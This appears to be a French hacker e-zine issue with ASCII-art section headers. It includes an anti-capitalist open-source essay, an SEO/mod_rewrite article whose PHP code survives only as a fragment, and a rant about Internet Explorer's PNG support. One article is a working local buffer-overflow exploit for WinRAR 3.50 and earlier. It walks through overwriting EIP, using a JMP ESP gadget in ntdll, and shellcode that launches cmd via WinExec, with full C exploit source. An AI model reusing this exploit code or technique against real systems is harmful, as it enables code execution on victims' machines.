`'-.,/ . `\_ '.,`-, | ``. | ``'.,, `'-,, ``---. '.,`', | `, | -=[ `''.,, ``'.,,-/``--., `.,`'., | ', | `'-.,_ `''.,. `| `-, '.------- '\,_ IE `'-.,_ `'-.`_ `_.-`-. |\-.,, ``-.,_ `'-., `'+-'`.-`` | '` ', ,|\., ``-.,_ ]=- ``'-|'` | V V ,' `\ `'-.,_ | | L _|\-.,7 7 | `'-., |\-/| /;| | `--,' `../ | ``'-. |o o|_ --. ,-`/ | | . | G G | / `-=+=- ` ` /` | ,-/ `'| ., ` ,. |``````''-., `\, .--_ | | ,-'` ', \`=`/ ,` `',, |/ ; / ``'--'` _,,.---- `''--'` `-,, || || ,.-` ```''-------___"____"______,--''` -=[Aka : INTÉGRISME ÉCONOMIQUE ]=- _______________________ _______________________ /|$$$$$$$$$$$$$$$$$$$$$$$| /|$$$$$$$$$$$$$$$$$$$$$$$| ||$$$$$$$$$$$$$$$$$$$$$$$| ||$$$$$$$$$$$$$$$$$$$$$$$| ||$$$$$$$$$$$$$$$$$$$$$$$| ||$$$$$$$$$$$$$$$$$$$$$$$| |/¯¯¯¯¯¯¯|$$$$$$$|¯¯¯¯¯¯/ ||$$$$$$$|¯¯¯¯¯¯¯¯¯¯¯¯¯¯/ ¯¯¯¯¯¯¯||$$$$$$$|¯¯¯¯¯¯ ||$$$$$$$|¯¯¯¯¯¯¯¯¯¯¯¯¯¯ ||$$$$$$$| ||$$$$$$$| ||$$$$$$$| ||$$$$$$$|_______ ||$$$$$$$| ||$$$$$$$$$$$$$$$| ||$$$$$$$| ||$$$$$$$$$$$$$$$| ||$$$$$$$| ||$$$$$$$|¯¯¯¯¯¯/ ||$$$$$$$| ||$$$$$$$|¯¯¯¯¯¯ ||$$$$$$$| ||$$$$$$$| ||$$$$$$$| ||$$$$$$$| ||$$$$$$$| ||$$$$$$$|_______________ _______||$$$$$$$|_______ ||$$$$$$$$$$$$$$$$$$$$$$$| /|$$$$$$$$$$$$$$$$$$$$$$$| ||$$$$$$$$$$$$$$$$$$$$$$$| ||$$$$$$$$$$$$$$$$$$$$$$$| ||$$$$$$$$$$$$$$$$$$$$$$$| ||$$$$$$$$$$$$$$$$$$$$$$$| ||$$$$$$$$$$$$$$$$$$$$$$$| |/¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯/ |/¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯/ ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ Depuis quelque années, un fléau s'abat sur notre société moderne: L'Intégrisme économique. Pour bien cerner le problème il est nécessaire tout d'abord de bien définir le terme « intégrisme ». Voici donc la définition de ce terme extraite du dictionnaire Petit Larousse: « Intégrisme - n. m. Attitude, opinion de ceux qui souhaitent maintenir dans son intégrité, sans qu'il évolue, un système doctrinal (et partic. religieux) donné. » Si l'on prend le temps de penser à un avenir un peu plus lointain que les prochaines élections ou la fin du mandat de tel, ou tel autre président, on constate que les ravages causés par cet intégrisme sont plus qu'importants : les ressources naturelles s'épuisent, on détruit notre environnement et on cours tout droit vers notre autodestruction tout en entraînant toute la vie sur terre dans cette course effrénée vers l'extinction. L'Humanité est présentement en état de crise. Il est donc devenu primordial de se questionner sur notre façon de vivre, sur les conséquences qu'elle entraîne et sur les alternatives disponibles. Le refus de toute argumentation, ou de toute expérience qui risque de montrer que nous sommes dans l'erreur, que notre mode de vie n'est plus approprié, ne serait que synonyme d'intégrisme. L'intégrisme, c'est l'incapacité à remettre en cause une idée acceptée depuis longtemps ou le refus de modifier une attitude prise pour acquise. Le « droit de propriété » dans notre société en est un très bon exemple... On a qu'à penser à la rivalité entre le mouvement OpenSource et le monopole Micro$off, ou aux nombreux scandales entourant le partage de fichiers p2p... Dès l'aube de l'Humanité, les hommes ont définis leur identité de par les contacts qu'ils avaient avec d'autres humains. Ce n'est qu'ensuite qu'ils se sont mis à se définir de par les objets, et la quantité d'objets, qu'ils possèdent. Ainsi, l'homme a imaginé de comparer tous les biens disponibles au moyen d'une caractéristique commune, le règne de l'argent est alors apparu. Mais au fait, qui au juste contrôle ce soit disant argent? Les banques peut-être? Ah oui, et qui contrôle les banques? Le gouvernement? Et qui contrôle celui-ci? Le peuple? ... Faites moi rire! Évidence maintenant déclarée, il est devenu évident que « l'argent mène le monde ». Il n'y a d'ailleurs plus un jour où on entend pas quelconque économiste déclarer que les lois du marché sont une vérité absolue à laquelle on doit adhérer. Quiconque ose s'opposer à cette nouvelle religion se fait aussitôt mettre de côté, accuser, et placer aux banc des étiquetés « irresponsables ». Mais est-ce vraiment irresponsable de se questionner sur le monde qui nous entoure? Sur les fondements même de notre mode de vie? Avouons-le, l'essentiel de notre existence repose présentement sur le principe de concurrence, de compétition, où les mots clés sont rentabilité et victoire du meilleur. La loi du plus fort. Le but étant, pour réussir sa vie, d'être un « gagnant ». Comme si un gagnant n'était pas par définition, un producteur de « perdants » ... Conditionnés à ce combat permanent contre les autres, comme une nécessité de la « lutte pour sa survie », les économistes ont enfermés l'homme dans une logique aboutissant à l'échec final de tous, autant le « gagnant » que le « perdant ». Cet échec étant masqué bien sûr par l'aveuglement que procure les petites réussites locales éphémères, mais qui, par accumulation ne peuvent conduire qu'à une catastrophe. Comme tous les intégrismes, l'intégrisme économique, subtilement nous envoûte de sa dangereuse doctrine, nous imposant sa façon de penser en nous désinformant grâce aux médias de ma$$es, aux publicités omniprésentes (quelle est l'utilité de la publicité sinon que de nous convaincre??) et surtout, grâce à notre vénérée télévision. Détenteur de la vérité, cet intégrisme adopte une hiérarchisation de la société supposée la seule efficace et ne cesse de la transmettre et de l'imposer à tous. Cette attitude à été celle de bien d'autres fanatiques, on a qu'à penser aux chrétiens aux moyen âge (croisées). De nos jours, les "sectateurs" de l'économie, voulant le bien des peuples du Sud, leur imposent leurs dogmes. En cas d'opposition, ces derniers feront sans doute l'objet d'une guerre (physique ou psychologique). À titre d'exemple, citons la Banque Mondiale (B.M.) et le Fonds Monétaire International (F.M.I.), supposés apporter une solution aux difficultés des pays défavorisés, mais, où le pouvoir (vote décisif) de chaque nation est proportionnel à sa contribution financière. Les pays les plus riches, ceux du G8 en particulier, imposent donc leur lois & règles, maintenant leur organisation sociale (les favorisants eux) en place. Pire encore, on constatera qu'au cours des dernières décennies, l'endettement des pays dits « défavorisés » s'est à ce point accru, que ces pays sont dans l'incapacité de rembourser leur dette, voir même les intérêts. Ainsi, on assiste présentement à un enrichissement des riches, au détriment des pauvres qui s'appauvrissent, l'écart social étant ainsi fortement accru. Là ne s'arrête pas la liste des méfaits de cet ignoble terrorisme économique... On a qu'à penser aux volet « écologique » de cette crise. De plus en plus d'espèces animales sont vouées à disparaître à cause de notre mode de vie, des forêts entières sont menacées, notamment les boréales et tropicales, sans compter l'accroissement grandissant de la pollution et du bouleversement climatique que celle-ci engendre. La liste des fléaux engendrée par cette façon de vivre irresponsable est encore bien longue... Mais il serait peut-être aussi bon de cerner les grands perdants dans toute cette jungle abandonnée à la productivité... Après tout, ne sagirait-il pas de nous, êtres humains, qu'on cherche à dresser les uns contre les autres? Maintenant conscient de ce piège dont est victime notre société, je crois maintenant venu le temps de changer les choses... À défaut de changer le monde, je peux me changer moi, ce pourquoi je décide de ne pas me plier à la norme qui m'est imposée, de refuser cette fatalité inhumaine qu'est l'intégrisme économique et de suivre ma conscience tout en étant le reflet de mon idéal et de mes valeurs. La société type Microsoft a fait son temps... À quand un monde autogéré et Opensource? Debout libertaires! Un monde meilleur est possible! [NDLR: Ubuntu, en plus d'être le nom d'une distribution Linux (basée sur Debian), est un therme africain signifiant « je suis ce que je suis parce que vous êtes ce que vous êtes », ou d'une manière plus littérale « Je suis ce que je suis grâce à ce que nous sommes tous » (traduction de : "I am what I am because of who we all are"). En d'autres termes, l'idée d'Ubuntu est celle d'une incitation réciproque, d'un partage qui construit mutuellement les êtres.] ,------. ,',, | `` , | | | | `,. / ` ```````' . ,.-'` _,- ,,,-' ., _ / ,',_-`#A'. O . \ \`H`, ```.`` \,X#W##`. , | C / `\ `\I#P###| . |_' T . ` G `\##MM#`. .. ,` I_' \ ,' \#BW##`, | | / W/\ | / |#N##Q#\ ,-, '' _.``| E / \ \_ /. /`\ ., ''''#W##' | | . . /_.- `H `-,, \ `,,- `` `\ | |`.#X| . | | O ` /F T,' `,.'', \ ,/---/ /,/ \#| `'' ..., O /O _, / `'`;\ `.`````'|/ \| / , ' - `-`` `-, /`` \ O | | .. ,' B/ | _ `'._ ' \ \ ` . | | /- U/ ````''--.,, `,| / \ ,--., `''` '' /O P/ . `. `-,, | \ __,' \....--------.,-,..,,,,'F .' \ ``' ` | _,,.-''```` | | | | / N ,'````''-.,,, `, | ,-'` | |''''```````| |''/ I /.,,_ `'-, \ ,| _ /-'''''```````\ / , `''. ` ` ```'_ | \ |`| /|`-,'` .,,`'--'` ,.-` \,,- `.'..-' _.-`-. '''''_,-`| `. | | | \ ``''-..,,,_ ` ,,,,.--'`` / `-... / | |/ \ ``````''''''''---------'''''''`````` / \.,,,_ | | || \ / | ``'''' ' | /| | |`''-..,,,_ _,,,,.--'`| | |/ | | | | | ``````''''''''---------'''''''`````` | | / | , | -' | | C'est quoi le top article du mag wyze ? | | | / | | | | Le ascii art | | | | | / / | how-to fake ascii | \ . | | | . | web-ascii converter | . | | | | / | Ascii art bomb | \ / | | | / | adjusting the ascii to the mindkind flavor? | \ / | | | , | lol | , | / | . | | | | | | | `. | | | |, , | | \ | | | | `'. ,` | \ \ _/. | | / `. | \ \ /` `-, ``''-..,,,_ _,,,,.--'`` ,` /.` \ \ ` ``-,, ``````''''''''---------'''''''`````` _,/ .'| ` \ \ , , ```'-..,,,_ _,,,,.--'`` ,` / \ '''-- `-., ```````'''''''---------'''''''`````` ,,,,-` ````''...,,,,,,,________ ,\. `.___ ---,, ,.--------,, ,,-'` ````'-..`` ` ''--''`` ```'.,,,,,,___------'` | ,--., x . __^__ -=*=- ,' NG \ --- "`-. | . ; MOON T| + - -- | }` ` /X@ BG| x -- / /--. \ H/ - ===/ \===E w {\_/} w `'--'` , . --- / / * /`-_.-{"}-._-'\ `---` / , '?' , \ , _.-.,, , x / / \./;"-";\./ \ \ -+- -` .|.,,`'-.,,_ , '`_-` `',`' ` ,-` ,-` |\ ``'-.,,_''--, / \ ,' -` \\\\\., `''-/,', ,,,,,,,,,,,,,, | BY | __ /- -' \\` X ` /`-- `','., ',,,| |, _ `` '| `. ', \| X v` | // ^--``\_, `','., | | ` | `. `.`. -` `\// /` ``\ ;- `',`-, |-=[ Wyzeman ]=-| | `. `.='-'` \ `-/ / .`;\| `'.`', | | | '/..````/.\, ```\/` . `'.`'., | | |-=[O4]=-| ``'-,, `''.,,``-/` _/`\ `'.,'., | | \_ | ``'.,, `'-.,/ . `\_ '.,`-, | ``. | ``'.,, `'-,, ``---. '.,`', | `, | -=[ `''.,, ``'.,,-/``--., `.,`'., | ', | Mod_ `'-.,_ `''.,. `| `-, '.------- '\,_ rewrite `'-.,_ `'-.`_ `_.-`-. |\-.,, ``-.,_ `'-., `'+-'`.-`` | ` ', ,|\., ``-.,_ ]=- ``'-|'` | V V ,' `\ `'-.,_ | | L _|\-.,7 7 | `'-., |\-/| /;| | `--,' `../ | ``'-. |o o|_ --. ,-`/ | | | G G | / `-=+=- ` ` /` | ,-/ `'| ., ` ,. |``````''-., `\, .--_ | | ,-'` ', \`=`/ ,` `',, |/ ; / ``'--'` _,,.---- `''--'` `-,, || || ,.-` ```''-------___"____"______,--''` =[Aka : A la conquete de son SEO interieur ]=- Vous connaissez la nouvelle mode ? le SEO, search engine optimisation. What the fuck is search engine optimisation ? C'est l'art d'optimiser votre site web pour les sites de recherches voyons (merci pour la traduction dude, mais sincèrement, ca veut dire quoi ? ). Ca veut dire que les sites comme google utilise des robots nommés crawler pour analyser le contenu de vos sites web pour determiner à quel place il va le sortir pour tel tel tel et tel requète qu'on lui demande. Comme le démontre les stats suivantes receuilli sur www.mindkind.org, optimiser sont site pour google est une bonne idée, les autres crawlers vous en avez rien à foutre ; - Google 421 421 - Google (Images) 38 50 - MSN 24 24 - AltaVista 9 9 - Lycos 7 7 - Yahoo 6 6 - AOL (fr) 3 4 - WebCrawler 3 3 - Ask Jeeves 1 1 Une base simple est à respecter pour google. il n'aime pas les arguments php et adore les .html . A un point t'el qu'un module de apache a été dévellopé spécialement afin de mapper des .html sur des ?page=1&id=2&jaipudidee=5 , il s'agit de mod_rewrite. C'est un outils indispensable au webmestre moderne, sauf que sont emploit peu etre chian dans un site dont le contenu est dynamique. Il peut devenir rapidement fastidieu d'updater votre .htaccess à chaque file uploader sur votre site web. N'étant pas plus imunisé à se probleme de naissance que vous, je me suis devellopé quelque petit outils de base en php qui me permettre de sauver extrèmement de temps tout en gardant mon site web facilement accessible à mon bon ami googlebot. $href"; mod_rewrite($flist[$x], $moo); } } } ?> l'ideal serait donc de partager ses 2 types de fonction en 2classe distinque, soit filesystem et mod_rewrite et etre appeller par un index.php indepandant, cependant dans le cas de petite page, simplement incluse se code dans l'index.php et vous sauverez beaucoup de temps, maintenant plus d'excuse pour ne pas etre en premiere page de google ;] wyzeman | ,--., x . __^__ -=*=- ,' NG \ --- "`-. | . ; MOON T| + - -- | }` ` /X@ BG| x -- / /--. \ H/ - ===/ \===E w {\_/} w `'--'` , . --- / / * /`-_.-{"}-._-'\ `---` / , '?' , \ , _.-.,, , x / / \./;"-";\./ \ \ -+- -` .|.,,`'-.,,_ , '`_-` `',`' ` ,-` ,-` |\ ``'-.,,_''--, / \ ,' -` \\\\\., `''-/,', ,,,,,,,,,,,,,, | BY | __ /- -' \\` X ` /`-- `','., ',,,| |, _ `` '| `. ', \| X v` | // ^--``\_, `','., | | ` | `. `.`. -` `\// /` ``\ ;- `',`-, |-=[ Ivanlef0u ]=-| | `. `.='-'` \ `-/ / .`;\| `'.`', | | | '/..````/.\, ```\/` . `'.`'., | | |-=[O5]=-| ``'-,, `''.,,``-/` _/`\ `'.,'., | | \_ | ``'.,, `'-.,/ . `\_ '.,`-, | ``. | ``'.,, `'-,, ``---. '.,`', | `, | -=[ `''.,, ``'.,,-/``--., `.,`'., | ', | WinRar `'-.,_ `''.,. `| `-, '.------- '\,_ Buf `'-.,_ `'-.`_ `_.-`-. |\-.,, ``-.,_ `'-., `'+-'`.-`` | ` ', ,|\., ``-.,_ ]=- ``'-|'` | V V ,' `\ `'-.,_ | | L _|\-.,7 7 | `'-., |\-/| /;| | `--,' `../ | ``'-. |o o|_ --. ,-`/ | | | G G | / `-=+=- ` ` /` | ,-/ `'| ., ` ,. |``````''-., `\, .--_ | | ,-'` ', \`=`/ ,` `',, |/ ; / ``'--'` _,,.---- `''--'` `-,, || || ,.-` ```''-------___"____"______,--''` =[Aka : Unrar more possibility's.. ]=- /* Local exploit for winrar <= 3.50 fr version (j'ai la ver 3.30 fr) Hello people. Aujourd'hui je me promène sur le web et la je tombe sur une news ds laquelle on trouve une vuln sur winrar puis un POC (proof of concept) je me dit si on l'exploitais ca pourrais etre marrant ..aller c'est partit. La vuln se situe au niveau d'un argument trop grand passé a winrar.exe un truc du genre winrar.exe A*500 fait planter le bordel, il nous dit qu'il peut pas ouvrir le machin et après on a une jolie erreur. Alors j'ouvre ollydgb ,je fous 500 A et je mate ou ca plante Il s'agit tout simplement d'un BOF c'est a dire qu'on peut rediriger le prog ou l'on veut car l'on controle le registre eip donc voila la portion de code 0045D6DD |. E8 BE0C0300 CALL ; \MessageBoxA 0045D6E2 |> 8D8C24 0004000>LEA ECX,DWORD PTR SS:[ESP+400] ; Case 2 of switch 0045D676 0045D6E9 |. 51 PUSH ECX ; /Arg1 0045D6EA |. E8 BD860200 CALL WinRAR.00485DAC ; \WinRAR.00485DAC 0045D6EF |. 59 POP ECX 0045D6F0 |. 33C0 XOR EAX,EAX 0045D6F2 |. EB 02 JMP SHORT WinRAR.0045D6F6 0045D6F4 |> B0 01 MOV AL,1 ; Case 1 of switch 0045D676 0045D6F6 |> 81C4 000E0000 ADD ESP,0E00 0045D6FC |. 5D POP EBP 0045D6FD |. 5F POP EDI 0045D6FE |. 5E POP ESI 0045D6FF |. 5B POP EBX 0045D700 \. C3 RETN en tps normal ds la stack on a: 0012EEEC 61616161 0012EEF0 61722E61 0012EEF4 00440072 WinRAR.00440072 l'addresse 12eef4 contient notre adresse de retour & les 61616161 sont nos A (~500 ici pourpas overwriter l'addr de ret) donc il suffit de foutre l'addresse que l'on veut et c'est gagner. L'on voit que esp vaut 0012EEF4 au niveau du RETN donc apres il va valloir 0012EEF8 car RETN= pop eip , call eip (en gros a chaque qu'on pop l'on incrémente l'esp de 4) il suffit de trouver dans la memoire de notre prog un JMP ESP pour aller executer les instructions a 12eef8 donc notre shellcode ;). Alors chez moi je trouve 78461BE3 FFE4 JMP ESP ds ntdll.dll (attention prend le dump hexa car ce n'est pas une section qui s'execute normalement) donc vla le sploit Faut mettre le exe ds le dossier de winrar & changer les addr des fonctions chez moi je suis sous Microsoft Windows 2000 [Version 5.00.2195] avec les dernières mise a jour. Un shellcode tout bete qui lance un shell sous win. 0012EEF9 55 PUSH EBP 0012EEFA 8BEC MOV EBP,ESP 0012EEFC 33FF XOR EDI,EDI 0012EEFE 57 PUSH EDI 0012EEFF C645 FC 63 MOV BYTE PTR SS:[EBP-4],63 0012EF03 C645 FD 6D MOV BYTE PTR SS:[EBP-3],6D 0012EF07 C645 FE 64 MOV BYTE PTR SS:[EBP-2],64 0012EF0B 57 PUSH EDI 0012EF0C C645 F8 01 MOV BYTE PTR SS:[EBP-8],1 0012EF10 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4] 0012EF13 50 PUSH EAX 0012EF14 B8 DE74E977 MOV EAX,KERNEL32.WinExec 0012EF19 FFD0 CALL EAX 0012EF1B BB BE69E977 MOV EBX,KERNEL32.ExitProcess 0012EF20 FFD3 CALL EBX mailto: ivanlef0u119@yahoo.fr website: http://membres.lycos.fr/moi118118/ */ #include #include #include int main ( void ) { char shellcode[]="\x55\x8B\xEC\x33\xFF\x57\xC6\x45\xFC\x63\xC6\x45\xFD\x6D\xC6 \x45\xFE\x64\x57\xC6\x45\xF8\x01\x8D\x45\xFC\x50\xB8" "\xDE\x74\xE9\x77" //add de winexex ds mon kernel32.dll (a modif) "\xFF\xD0" "\xBB" "\xBE\x69\xE9\x77" //addr de ExitProcess ds Kernel32.dll "\xFF\xD3"; char buf[3000]; char cmd[3000]; memset(buf, 0x00, 3000); memset(cmd ,0 ,3000); memset(cmd, 0x61, 516); sprintf(buf, "winrar %s",cmd); strcat(buf,"\xe3\x1b\x46\x78"); //jmp esp in ntdll strcat(buf,shellcode); system(buf); } | ,--., x . __^__ -=*=- ,' NG \ --- "`-. | . ; | MOON T| + - -- | }` ` | /X@ BG| x -- / /--. \ H/ - ===/ \===E w {\_/} w `'--'` , . --- / / * /`-_.-{"}-._-'\ `---` / , '?' , \ , _.-.,, , x / / \./;"-";\./ \ \ -+- -` .|.,,`'-.,,_ , '`_-` `',`' ` ,-` ,-` |\ ``'-.,,_''--, / \ ,' -` \\\\\., `''-/,', ,,,,,,,,,,,,,, | BY | _ __ /- -' \\` X ` /`-- `','., ',,,| |, _ `` '| `. ', \| X v` | // ^--``\_, `','., | | ` | `. `.`. -` `\// /` ``\ ;- `',`-, |-=[ h3 ]=-| | `. `.='-'` \ `-/ / .`;\| `'.`', | | | '/..````/.\, ```\/` . `'.`'., | | |-=[O6]=-| ``'-,, `''.,,``-/` _/`\ `'.,'., | | \_ | ``'.,, `'-.,/ . `\_ '.,`-, | ``. | ``'.,, `'-,, ``---. '.,`', | `, | -=[ `''.,, ``'.,,-/``--., `.,`'., | ', | PNG `'-.,_ `''.,. `| `-, '.------- '\,_ owns `'-.,_ `'-.`_ `_.-`-. |\-.,, ``-.,_ `'-., `'+-'`.-`` | '` ', ,|\., ``-.,_ ]=- ``'-|'` | V V ,' `\ `'-.,_ | | L _|\-.,7 7 | `'-., |\-/| /;| | `--,' `../ | ``'-. |o o|_ --. ,-`/ | | . | G G | / `-=+=- ` ` /` | ,-/ `'| ., ` ,. |``````''-., `\, .--_ | | ,-'` ', \`=`/ ,` `',, |/ ; / ``'--'` _,,.---- `''--'` `-,, || || ,.-` ```''-------___"____"______,--''` -=[Aka : L'histoire d'un mouton noir ]=- Bon, je sais qu'il n'y a rien de nouveau sous le soleil, le débat entourant le support du standard de format graphique PNG avec Internet Explorer est vieux comme le monde. Mais en tant que webmaster frustré par un monstre de l'informatique, je tien à faire tout ce qui est en mon pouvoir pour les dénoncés. Et pour l'instant les 2 seuls choses que je peux faire, c'est utiliser ce format le plus souvent possible et écrire un article pour dénoncer de tel pratique, qui selon moi, sont scandaleuses. Microsoft corp. (sa fait encore plus evil :>) tue la concurrence dans l'oeuf en les supportant très mal ou pas du tout dans leur navigateur. Premièrement y faut savoir qu'Internet Explorer détient environs 87.2% des pars de marché (en date du 25 août 2005) donc on peut clairement parler de monopole. Ce monopole y l'ont acquis en profitant d'un autre monopole, celui de leur système d'exploitation .. N'importe quel version de Windows vient avec internet explorer "out of the box" ce qui fait que maintenant, pour quantité de personne simples d'esprits (en informatique du moins) Internet c'est le gros "E" bleue sur leur desktop. Bravo Microsoft. En 1996 quand le format PNG à été introduit et approuvé par le W3C; "The PNG specification was first issued as a W3C Recommendation on 1st October, 1996 (press release) and updated to a second edition incorporating all errata on 10 November 2003. This edition is also an ISO standard, ISO/IEC 15948:2003 (E)." "This means it is a mature document that is considered to contribute towards realising the full potential of the Web. Viewers for PNG are available on many platforms; there are an increasing number of content creation tools available; and thus modern browsers implement support for it also." - W3C Microsoft devait posséder plus de 90% des pars de marché des navigateur (probablement autour de 95%). A cette date, les formats les plus utiliser était le JPEG et le GIF, au début Microsoft à tout simplement ignoré le format PNG. Assez difficile de percé le marché quand votre seul moyen de propagation possède le marché au complet et ne veux pas de vous. PNG étant de loin un meilleur format que GIF, des groupes de pression ce sont rapidement organisés pour forcer Microsoft à implanter ce format dans leur navigateur. Microsoft leur à promis de le faire pendant 4ans avant de ce décider à passer à l'action .. et tout le monde sais à quoi on peu s'attendre d'eux.. "While other browser manufactures include PNG support as a 3rd party option , Internet Explorer 4.0 provides native support for PNG." Pouvait-on lire dans le whitepaper d'ie4. Ils ont simplement oublier de mentionner qu'ils l'avaient fait seulement pour la version MAC d'Internet explorer .. petite nuance :) MSIE pour mac possèdes des pars de marchés ridicules à comparé de la version Windows. Aujourd'hui, presque 10 ans après l'introduction du format PNG sur le web, la version 6 d'internet explorer "supporte" le format PNG. Bien sur le PNG s'affiche, mais comme on est en droit de s'attendre des pires coup bas de la pars de Micro$hit, le PNG s'affiche avec quelques défauts qui le rendent pratiquement inutilisable. Je m'explique.. Le premier des 2 bugs introduits VOLONTAIREMENT (sa crève les yeux) et le plus évident, est sans doute celui de la transparence. Si vous faite une image avec de la transparence, la mettez sur votre page web, vous verrez que dans firefox tout s'affiche sans failles. Ouvrez maintenant la même page dans Ie .. tada! un beau background gris ! (voir fig.A) Ce simple bug est assez chiant pour décourager 90% des designers web qui vont aussitôt ce tourner vers le format GIF. Et pour les purs et durs qui méprisent suffisamment Microsoft pour vivre avec ce bug, le pire n'est pas passé. Ils devront se confronter à un autre bug, lui encore plus vicieux, qui rend la tâche du designer pratiquement impossible.. Les couleurs ne match pas :| Si vous prenez par exemple la couleur hexadécimal (CSS) #cc3300 pour votre background, et que, parce que vous détester suffisamment microsoft pour encore utiliser le format PNG, vous mettez le logo dans une image avec un background rouge (#cc3300) pour "simuler" un effet de transparence sur un format graphique qui supporte très bien la transparence .. vous regarder le résultat dans firefox.. tout est parfait, on vérifie dans Internet explorer, surprise! il y a un ton de différence, ce qui fait que votre image se distingue très clairement de votre background (voir fig.B). Comme vous pouvez le constater, le match de couleur est vraiment loin d'être parfait, on passe de #cc3300 à #C62900.. (J'ai photoshop comme témoin à charge vous pouvez consulter sa déposition à la fig. C) Il y a de quoi décourager les designers web les plus hardcores. Microsoft à réussit à préserver pendant 10 ans le monopole d'un vieux format graphique désuet et qui plus est, propriétaire. En fait, contrairement à la croyance général, ce n'est pas le format GIF qui est propriétaire, mais l'algorithme de compression LZW qui appartenait à la compagnie Unisys, je dis appartenait car le brevet est expiré depuis le 20 juin 2003. Je ne sais pas ce que sa change d'un point de vus légal .. un brevet est-il renouvelable ? Bref je ne sais pas si il est encore propriétaire ou pas. Il reste que le format PNG est supérieur en plusieurs points au format GIF, quand le browser le supporte à 100% bien sur. - Permet la sauvegarde d'image sans perte de qualité - supporte 8, 24 et 64 bit de profondeur de couleurs (GIF supporte seulement 8bit, soit 256 couleurs) - Meilleur compression (environs 20% plus petit) - alpha channels à transparences variables - une correction gamma (brightness) et des couleurs cross-platform - interlacement bi-dimensionnel - non breveté Le seul désavantage que peux lui trouver, c'est l'absence de support pour les animations. Peut-être qu'avec tout ces avantages Microsoft c'est enfin ouvert les yeux, car ils promette un support PNG à 100% avec Internet Explorer 7 .. C'est peut-être aussi tout simplement parce que le brevet sur la compression LZW est expiré.. qui sait :) Personnellement, je vais le croire quand je vais le voir. En conclusion, il me parait évident que si Microsoft mettrait autant d'énergie et d'imagination au service du développement technologique qu'il en met pour éliminer la compétition, nous serions beaucoup plus avancé technologiquement. Mais le modèle propriétaire vas ou l'argent vas, même si c'est à l'encontre de l'évolution technologique. Pour moi c'est un exemple frappant de la supériorité du modèle open source au niveau dévelopement et de l'évolution technologique. Acronymes: PNG (Portable Network Graphics) GIF (Graphics Interchange Format) W3C (world wide web consortium ) LZW (Lempel-Ziv-Welch .. évidanement) http://www.dogma.net/markn/articles/lzw/lzw.htm Lexique: alpha channels à transparences variables: Sa permet de sauvegardé une image avec un anti-alias ET une transparence. Par exemple, si vous faites un dropshadow avec une transparence avec le format GIF, le dropshadow vas sembler pixelisé (comme un escalier) Tandis qu'avec le format PNG, le dropshadow vas être smooth. interlacement bi-dimensionnel: Sa permet au utilisateurs avec une connection lente de voir un aperçu basse qualité d'une image pendant qu'elle se télécharge. La qualité de l'image s'améliora au fur et a mesure que sont téléchargement avance. h3 ,------. ,',, | `` , | | | | `,. / ` ```````' . ,.-'` _,- ,,,-' ., _ / ,',_-`#A'. O . \ \`H`, ```.`` \,X#W##`. , | C / `\ `\I#P###| . o |_' T . ` G `\##MM#`. .. ,` I_' \ ,' \#BW##`, o | | / W/\ | / |#N##Q#\ ,-, '' _.``| E / \ \_ /. /`\ ., ''''#W##' | | . . /_.- `H `-,, \ `,,- `` `\ | |`.#X| . | | O ` /F T,' `,.'', \ ,/---/ /,/ \#| `'' ..., o O /O _, / `'`;\ `.`````'|/ \| / , ' - `-`` `-, /`` \ O | |o .. ,' B/ | _ `'._ ' \ o \ ` . | | /- U/ ````''--.,, `,| / \ ,--., `''` '' /O P/ . o `. `-,, | \ __,' \....--------.,-,..,,,,'F .' \ ``' ` | _,,.-''```` | | | | / N ,'````''-.,,, `, | ,-'` | |''''```````| |''/ I /.,,_ `'-, \ ,| _ /-'''''```````\ / , `''. ` ` ```'_ | \ |`| /|`-,'` .,,`'--'` ,.-` \,,- `.'..-' _.-`-. '''''_,-`| `. | | | \ ``''-..,,,_ ` ,,,,.--'`` / `-... / | |/ \ ``````''''''''---------'''''''`````` / \.,,,_ | | || \ / | ``'''' ' | /| | |`''-..,,,_ _,,,,.--'`| | |/ | | | | | ``````''''''''---------'''''''`````` | | / | , | -' | | slt tout le monde | | | / | | | | slt all | | | | | / / | ya des vrai pirates ici?? | \ . | | | . | j'ai besoin d'aide | . | | | | / | | \ / | | | / | | \ / | | | , | | , | / | . | | | | | | | `. | | | |, , | | \ | | | | `'. ,` | \ \ _/. | | / `. | \ \ /` `-, ``''-..,,,_ _,,,,.--'`` ,` /.` \ \ ` ``-,, ``````''''''''---------'''''''`````` _,/ .'| ` \ \ , , ```'-..,,,_ _,,,,.--'`` ,` / \ '''-- `-., ```````'''''''---------'''''''`````` ,,,,-` ````''...,,,,,,,________ ,\. `.___ ---,, ,.--------,, ,,-'` ````'-..`` ` ''--''`` ```'.,,,,,,___------'` | ,--., x . __^__ -=*=- ,' NG \ --- "`-. | . ; | MOON T| + - -- | }` ` | /X@ BG| x -- / /--. \ H/ - ===/ \===E w {\_/} w `'--'` , . --- / / * /`-_.-{"}-._-'\ `---` / , '?' , \ , _.-.,, , x / / \./;"-";\./ \ \ -+- -` .|.,,`'-.,,_ , '`_-` `',`' ` ,-` ,-` |\ ``'-.,,_''--, / \ ,' -` \\\\\., `''-/,',,,,,,,,,,,,,,,,,, | BY | _ __ /- -' \\` X ` /`-- `','., ',,,| |, _ `` '| `. ', \| X v` | // ^--``\_, `','., | | ` | `. `.`. -` `\// /` ``\ ;- `',`-, |-=[ c4 ]=-| | `. `.='-'` \ `-/ / .`;\| `'.`', | | | '/..````/.\, ```\/` . `'.`'., | | |-=[O7]=-| ``'-,, `''.,,``-/` _/`\ `'.,'., | | \_ | ``'.,, `'-.,/ . `\_ '.,`-, | ``. | ``'.,, `'-,, ``---. '.,`', | `, | -=[ Le `''.,, ``'.,,-/``--., `.,`'., | ', | clown `'-.,_ `''.,. `| `-, '.------- '\,_ de `'-.,_ `'-.`_ `_.-`-. |\-.,, ``-.,_ citoyenneté `'-., `'+-'`.-`` | '` ', ,|\., ``-.,_ canadienne]=- ``'-|'` | V V ,' `\ `'-.,_ | | L _|\-.,7 7 | `'-., |\-/| /;| | `--,' `../ | ``'-. |o o|_ --. ,-`/ | | . | G G | / `-=+=- ` ` /` | ,-/ `'| ., ` ,. |``````''-., `\, .--_ | | ,-'` ', \`=`/ ,` `',, |/ ; / ``'--'` 